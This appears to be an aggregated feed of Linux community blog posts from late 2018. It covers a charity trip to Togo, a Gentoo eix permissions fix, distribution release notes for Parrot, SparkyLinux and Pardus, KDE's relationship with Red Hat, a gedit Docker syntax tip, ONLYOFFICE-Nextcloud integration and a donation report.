Image source: YovoTogo

04 November, 2018 06:41PM by Patrick Emmabuntüs

Voyage de solidarité 2018 de nos amis de YovoTogo (Épisode 5)

Saturday October 27 (a day in Dapaong)

We pick up Émilie and Marie-Jo (sponsored through the association) at the Collège Mô-Fant in Dapaong, where they board, for an outing mainly around the town market. As every year, it is an opportunity to buy them a few things to improve their daily life. This time we hand them a sum of money and let them manage it themselves, so they lead us from shop to shop and from stall to stall, buying toiletries, cleaning products, a stock of vegetables and of gari (a kind of cassava porridge), buckets and other utensils…

Jean-Marie and Claude take the plunge and taste fried caterpillars under the amused eyes of the stallholders. Well, you have to like them, and appreciate the nourishing virtues they are supposed to bring, because frankly, according to the two of them, taste-wise they are far from great…

We then meet at the maquis for lunch, where we are joined by Afo, the FabLab manager of JUMP Lab'Orione, together with his 3-year-old son. For a group photo we are also joined by Émilie's mother and her uncle, who is passing through the area. There is a crowd on this market day and the service is slow, so we use the wait to chat with the girls before walking them back to the school.

Next we head for the "Hôpital d'Enfants Yendube", run by the "Sœurs Hospitalières". The director of the establishment receives us and agrees to give us a guided tour of the hospital, where many children are being treated.

Back in Bombouaka, we spend the evening with the teenagers of the Father Sébastien home, who have prepared the meal with the provisions we supplied them from a list they drew up. A very friendly and warm evening, which continues with the traditional "bal poussière" (dust ball) orchestrated by Isaac, the evening's DJ.

Sunday October 28

A "sports" morning with the young people with disabilities of the Father Sébastien home at the Saint Louis Orione Center in Bombouaka: the association hands over a ping-pong table, together with table tennis equipment (rackets, balls, nets, scoreboards) and sportswear collected and donated by the table tennis section of the A.S.R.Y. (Association Sportive des Retraités Yonnais) of La Roche-sur-Yon, as well as 15 football jerseys donated by the IME des Terres Noires in La Roche-sur-Yon (85).

The afternoon is devoted to the Women Leaders of Tandjouaré (AFL-Tan). These women pool their energy to raise funds in order to finance micro-credits. Together they make Néré mustard and liquid soap. Their main income is the membership fee of 2,000 FCFA per month (3.05 €) plus the interest on the loans. These three-month loans, renewable as soon as they are repaid, mainly go toward health care, children's schooling and the start-up of income-generating activities. Marie Paule, who has belonged to this group for several years, was joined this year by Françoise, Clémence and Isabelle.

A talk on feminine hygiene and honey dressings drew a great deal of attention. The afternoon was also an opportunity to dance and to share Togolese specialities accompanied by Tchapalo.

Monday October 29

Very early we have an appointment with Georges MOUTORE, secretary general of the OCDI (Organisation de la Charité pour un Développement Intégral) Caritas Togo in Dapaong. As we have for several years now, we hand him a collection of nearly 2,000 pairs of glasses, which will be calibrated, catalogued and reconditioned for the poorest by César BOUKONTI, the technician of the "Route de la lumière" optical workshop at the Dapaong hospital.

Today is the last family visit to children with disabilities monitored by the Center. We call on Christine and on Merveille.

Christine was examined at the Center for the first time on May 4, 2016. The consultation showed that she suffers from tetraplegia and lies in lateral decubitus. She is a very intelligent girl despite her impairment and currently attends the local community secondary school of her village. As she cannot sit up, the Center found her a chair more or less adapted to her condition so that she can continue her classes. She is a very kind girl, but she will need lifelong assistance because she cannot carry out the activities of daily living on her own. Nevertheless she expresses herself correctly and stubbornly refuses to return to the Center, preferring to live with her family. It is a very complicated situation to manage for everyone, the family as well as the Center that follows her.

Merveille was born with a bilateral congenital equinus foot deformity. She first received successive cast corrections and was then operated on during a mission of orthopedic and plastic surgeons organized by the "Saint Louis Orione" Center in 2008. Taken in at the Center's "Padre Pio Village" boarding school in October 2012 for better support of her schooling, she is now 11 years old, walks almost normally and attends secondary school without difficulty.

Tuesday October 30

The project of assembly, welding, painting and finishing being complete, around 8 AM this morning the young people of the welding workshop hurry to carry their "work" to the spot reserved for it at the Don Orione Center. First they load red sand onto a cart, which they then spread out to install their pieces.

The creations are unanimously christened "Retour des champs" ("Back from the fields"). A villager on his bicycle, another standing, and a little imaginary animal make up this original scene…

Finally, each in turn, or in groups, they eagerly pose next to their creations to have their picture taken.

The feedback is very positive: the young welders and Maxime thank me with drawings and words, most of which express joy and a sense of accomplishment at having learned to "make" and to "discover" new things.

They said it themselves: the creative project must continue. And I, in turn, learned a great deal from the way they live and work every day with the means at their disposal…

Jean Marie

Meanwhile…

After finalizing the interviews for drawing up the job descriptions, a final meeting with the nursing staff and the physiotherapists, held to present a proposed work organization, was well received. This organization would ensure a continuous presence at the Center, better monitoring of the people hosted there and improved individual support.

Then an exchange with Father Pierre on the running of the Center (work organization, management, the children of the Cottolengo, security, etc.) and the exploration of ways to improve it revealed both the need and the ambition to change practices.


With Tchaou and Maurice in the social service

Extract from: Voyage de solidarité 2018 de nos amis de YovoTogo

Image source: YovoTogo

04 November, 2018 06:32PM by Patrick Emmabuntüs

hackergotchi for Ubuntu developers

Ubuntu developers

Santiago Zarate: gentoo eix-update failure


If you are having the following error on your Gentoo system:

 Can't open the database file '/var/cache/eix/portage.eix' for writing (mode = 'wb') 

Don’t waste your time: the /var/cache/eix directory is simply missing and/or not writable by the eix/portage user.

mkdir -p /var/cache/eix
chmod +w /var/cache/eix*

The basic story is that eix drops privileges to the portage user when run as root.
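The failure mode is easy to reproduce without touching the real cache (the /tmp/eix-demo path below is purely illustrative): writing into a missing directory fails, and mkdir -p fixes it.

```shell
# Hypothetical scratch path standing in for /var/cache/eix --
# safe to run as a regular user.
CACHE=/tmp/eix-demo/cache
rm -rf /tmp/eix-demo

# Fails: the parent directory does not exist yet.
( : > "$CACHE/portage.eix" ) 2>/dev/null && echo "write ok" || echo "write failed"

# Create the directory, then the same write succeeds.
mkdir -p "$CACHE"
( : > "$CACHE/portage.eix" ) && echo "write ok" || echo "write failed"
```

The first attempt prints "write failed", the second "write ok" — exactly the difference the mkdir/chmod fix above makes for eix.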

04 November, 2018 12:00AM

November 03, 2018

hackergotchi for Parrot Security

Parrot Security

Parrot 4.3 Release Notes

Parrot 4.3 is now available for download. This release provides security and stability updates and is the starting point for our plan to develop an LTS edition of Parrot.   Our plans for Parrot LTS We are working on a Parrot LTS branch, a long term support, release-based distribution to provide long term reliability to […]

03 November, 2018 06:32PM by palinuro

hackergotchi for SparkyLinux


Upgrade Checker 0.1.10

There is an update of Sparky APTus Upgrade Checker 0.1.10 available in our repos.

The Upgrade Checker checks the package lists and displays information about new updates in a small graphical window.

The latest version provides the following changes:

1. Clicking the “Yes” button to run the Sparky Upgrade tool now requires the root password to be entered, so it is more secure than before and no one else can make such changes on your machine.

2. Added the System Upgrade Scheduler, which is available from Menu -> System.
It lets you add a cron job for the system upgrade, and remove it as well.

The tool can be configured to check for updates every 1, 2, 4, 8 or 12 hours.
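For reference, those intervals map onto ordinary cron "every N hours" schedules. A sketch of what such system crontab entries look like — the exact command the scheduler installs is an assumption, so "sparky-upgrade" below is only a placeholder for the upgrade tool it launches:

```shell
# Print a sample system crontab line for each interval the
# scheduler offers (1, 2, 4, 8 or 12 hours).
for n in 1 2 4 8 12; do
  printf '0 */%s * * * root sparky-upgrade\n' "$n"
done
```

Each line fires at minute 0 of every Nth hour; the scheduler simply manages one such entry for you.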

sudo apt update
sudo apt install sparky-aptus-upgrade-checker

Additional packages useful with the cron tool:
– tksuss (on GTK-based desktops) or
– menu + kde-runtime (on KDE/LXQt desktops).

System Upgrade Scheduler


03 November, 2018 05:12PM by pavroo

hackergotchi for Pardus


Pardus 17.4 Released

Pardus 17.4, whose development is carried on by TÜBİTAK ULAKBİM, has been released.

The latest Pardus release contains improvement, stability and security updates for more than 300 packages. The versions of the applications users rely on most were upgraded: Firefox to 60.3.0, Thunderbird to 60.2.1, VLC to 3.0.3 and LibreOffice to 6.1.3. In addition, unlike previous releases, the 17.4 minimal/server edition ships with the openssh-server package preinstalled, which allows system administrators to use provisioning tools such as Ansible right from installation.

To apply these changes, it is enough to keep your installed Pardus 17 system up to date.

What is new?

  • Many usage-scenario issues encountered by end users in the graphical interfaces were fixed.
  • Many package updates and optimizations affecting system performance were made.
  • Security updates covering more than 300 packages and patches were added to the system.
  • The default web browser, Firefox, was updated to version 60.3.0.
  • The default e-mail client, Thunderbird, was updated to version 60.2.1.
  • The default media player, VLC, was updated to version 3.0.3.
  • The default office document application, LibreOffice, was updated to version 6.1.3.
  • openssh-server now comes preinstalled in the minimal/server edition.
  • The broken sources list after installation in scenarios without Internet access was fixed.
  • The default boot splash background was changed.

You can download Pardus 17.4 right now; for detailed information about this release, see the release notes.

03 November, 2018 10:06AM by Gökhan Gurbetoğlu

November 02, 2018

hackergotchi for Ubuntu developers

Ubuntu developers

Jonathan Riddell: Red Hat and KDE

By a strange coincidence the news broke this morning that RHEL is deprecating KDE. The real surprise here is that RHEL supported KDE at all.  Back in the 90s they were entirely against KDE and put lots of effort into our friendly rivals Gnome.  It made some sense, since at the time Qt was under a not-quite-free licence and there’s no reason why a company would want to support another company’s lock-in as well as shipping incompatible licences.  By the time Qt became fully free they were firmly behind Gnome.  Meanwhile Rex and a team of hard-working volunteers packaged it anyway and gained many users.  When Red Hat was split into the all-open Fedora and the closed RHEL, Fedora was able to embrace KDE as it should, but at some point the Fedora Next initiative again put KDE software in second place. Meanwhile RHEL did use Plasma 4 and hired a number of developers to help us in our time of need, which was fabulous, but all except one left some time ago and nobody expected the support to continue for long.

So the deprecation is not really new or news, and being picked up by the press is poor timing for Red Hat; it’s unclear whether they want some distraction from the IBM news or it’s just The Register playing around.  The community has always been much better at supporting our software for its users; maybe now the community-run EPEL archive can include modern Plasma 5 instead of being stuck on the much poorer previous release.

Plasma 5 is now lightweight and feature-full.  We get new users and people rediscovering us every day who report it as the most usable and pleasant way to run their day.  From my recent trip to Barcelona I can see how a range of different users, from universities to schools to government, consider Plasma 5 the best way to support a large user base.  We now ship on high-end devices such as the KDE Slimbook down to the low-spec value device of Pinebook.  Our software leads the field in many areas, such as the video editor Kdenlive, the painting app Krita and the educational suite GCompris.  Our range of projects is wider than ever before, with the textbook project WikiToLearn allowing new ways to learn, and we ship our own software through KDE Windows, Flatpak builds and KDE neon with Debs, Snaps and Docker images.

It is a pity that RHEL users won’t be there to enjoy it by default. But, then again, they never really were. KDE is collaborative, open, privacy aware and with a vast scope of interesting projects after 22 years we continue to push the boundaries of what is possible and fun.


02 November, 2018 04:36PM

Diego Turcios: Getting Docker Syntax In Gedit

I have been working with Docker over the last few days and ran into a syntax highlighting issue with gedit: Dockerfiles show up as plain text. A quick search turned up an easy fix in Jasper J.F. van den Bosch's repository on GitHub.
We need to download the docker.lang file, available here:

After that, go to the folder where you saved the file and run the following command.
sudo mv docker.lang /usr/share/gtksourceview-3.0/language-specs/
If this doesn't work, you can try the following:

sudo mv docker.lang ~/.local/share/gtksourceview-3.0/language-specs/
And that's all!
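The two destinations above can be folded into a one-shot, per-user install that needs no sudo (assuming docker.lang has already been downloaded to the current directory):

```shell
# Per-user language-spec directory searched by gedit's GtkSourceView 3.
DEST="${XDG_DATA_HOME:-$HOME/.local/share}/gtksourceview-3.0/language-specs"
mkdir -p "$DEST"

# Move the file only if it is actually here.
if [ -f docker.lang ]; then
  mv docker.lang "$DEST/"
fi
echo "language specs dir: $DEST"
```

Restart gedit afterwards so it re-scans the language-spec directories.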

Screenshot of gedit with no docker lang

Screenshot of gedit with docker lang

02 November, 2018 04:18PM by Diego Turcios

hackergotchi for Univention Corporate Server

Univention Corporate Server

ONLYOFFICE & Nextcloud Now in UCS: How the Solutions Met Again

Today we share our story about how ONLYOFFICE and Nextcloud have formed a strong duo within corporate infrastructures, and how Univention helps it become even more technically accessible to users.

Combined on-premises solutions for in-house collaboration

What the industry needs, it gets! Popular free services such as Google Drive, which combine sharing and editing, have long been a great help to students, freelancers and businesses. At the corporate scale, however, responsibility and development call for more security and tighter integration. This gap gave birth to combinations of on-premises solutions for in-house collaboration.

Back in 2017, we created an integration app for Nextcloud that lets you edit and collaborate right in the Nextcloud interface, transferring data between the editors and the cloud platform. OOXML-based editors (with DOCX, XLSX and PPTX at the core) were destined for success in such a combination, since the niche had previously only offered options designed mainly for ODF files.

The open nature of open source, in turn, did much to sustain the app's development. Today the ONLYOFFICE-Nextcloud combo is already used by a number of names in various spheres, such as WayRay, Promotion Santé Valais, Inblay and a range of others.

Screenshot of ONLYOFFICE

How the integration of ONLYOFFICE-Nextcloud works

The three main components it takes are ONLYOFFICE Document Server to edit the documents, Nextcloud Server to manage and share them, and the integration app (connector) to transfer documents between the editor and the storage. Let us quickly explain the role of the latter in this system.

Data exchange

ONLYOFFICE and Nextcloud are written in different languages (Node.js/JavaScript and PHP, respectively) and use different formats and methods, which technically makes the apps completely alien to each other on the user's server. The exchange of data is therefore impossible unless it is converted and restructured to fit the formats of the counterpart. That's why we needed a specific app to serve as a bridge between the two.

Management & Configuration

Roughly, the integration app provides your system with:

  • Configuration unit (settings directory) to manage data transport between the instances of ONLYOFFICE and Nextcloud;
  • A specific page to accommodate the editors within the interface;
  • A set of interface elements to manipulate actions;
  • Handlers to support file saving, sharing and other operations.
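On a plain Nextcloud, outside the pre-configured UCS environment, the same connector can be pointed at a Document Server by hand with Nextcloud's occ tool. This is a hedged sketch: the app id "onlyoffice" and the DocumentServerUrl key are taken from the public connector, docs.example.com is a placeholder, and the commands are echoed as a dry run so they are safe to paste — drop the echo to actually apply them:

```shell
# Dry run: each command is printed, not executed. Run the real
# commands from the Nextcloud installation directory as the web
# server user; docs.example.com is a placeholder URL.
echo sudo -u www-data php occ app:enable onlyoffice
echo sudo -u www-data php occ config:app:set onlyoffice DocumentServerUrl --value=https://docs.example.com/
```

The second command is the configuration-unit equivalent of entering the Document Server address in the connector's settings page.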

Compatibility of ONLYOFFICE and Nextcloud

As both ONLYOFFICE and Nextcloud add features and changes in new versions, we constantly modernize the app so that it recognizes the new data formats in both services.

Moreover, each time we build it to support not only the latest versions but all previous generations as well. For example, when updating the app for Nextcloud 13, it was crucial that it still works fully with Nextcloud 12, 11, 10 and so on.

ONLYOFFICE-Nextcloud pre-configured within the UCS environment

In Univention Corporate Server, the ONLYOFFICE-Nextcloud system functions in a similar way to how it does elsewhere, i.e. through an integration app. However, the pre-built environment makes installation, configuration and updates much less of a routine and more UX-optimized for admins.

The installation process is to a large extent automatic, as the settings are pre-configured. During an update, the additional configuration data (scripts, addresses and domains) is automatically carried over from the old version.

Further extension options with Univention App Center Apps

In addition, the other apps that work in UCS can improve and extend the experience of the ONLYOFFICE-Nextcloud combo. For example, you can further secure the data transfer between the services domain-wise with Let’s Encrypt, which provides HTTPS for the server using automatically renewed SSL/TLS certificates.

A sharing platform and collaborative office suite for UCS users: benefits & requirements

With ONLYOFFICE paired with Nextcloud in UCS, you get an elaborate combination of a sharing platform and a collaborative office suite that is secure, scalable and handles all popular document formats.

Largely automated, the platform requires minimal manual configuration, which makes the online office accessible to organizations with limited technical personnel (e.g. schools).

To meet every demand, ONLYOFFICE offers two versions: the free open source version for small and medium teams with up to 20 sessions, and the business-tailored Integration Edition, which is flexible in the number of users and includes more professional functionality.

If you have any questions regarding ONLYOFFICE and Nextcloud integration, feel free to comment below, or contact us at

Download ONLYOFFICE with Nextcloud as a ready-to-use virtual image

Further information

Installation guide of the Nextcloud-ONLYOFFICE Univention App Appliance

The post ONLYOFFICE & Nextcloud Now in UCS: How the Solutions Met Again first appeared on Univention.

02 November, 2018 01:12PM by Anna Srinivasan

November 01, 2018

hackergotchi for SparkyLinux


October 2018 donation report

We would like to thank all of you very much – you are great as always.

Your donations let us pay the monthly bills and, very importantly, the yearly bill for the virtual server.

Thanks again for another year with you.

Don’t forget to send a small tip in November too 🙂

Aneta & Paweł

Krzysztof M.
PLN 50
Wojciech H.
Emil N.
PLN 30
Martin S.
€ 15
Georg K.
€ 11,11
Paweł M.
PLN 25
Paweł M.
PLN 50
Remi C.
€ 20
Waldemar P.
PLN 50
Dritan P.
€ 15
Rafał W.
PLN 15
Andrzej M.
PLN 10
Adam J.
PLN 30
Ruedi L.
€ 10
Brian P.
€ 5
Alexander F.
€ 10
Gernot P.
$ 10
Merlyn M.
$ 5
Thomas F.
$ 5
Adrian B.
$ 1
Stanisław W.
PLN 20
Jacek G.
PLN 40
Michael L.
€ 3,59
Chance L.
€ 50
Francois K.
€ 25
Michael C.
€ 35
Thomas L.
€ 11
Piotr R.
PLN 50
Marek M.
Jork S.
€ 2,5
Jens G.
€ 100
Krzysztof S.
PLN 20
Przemysław P.
PLN 50
William S.
€ 50
Dirk O.
€ 15
Tomasz M.
PLN 10
PLN 456
€ 378,2
$ 21

01 November, 2018 08:18PM by pavroo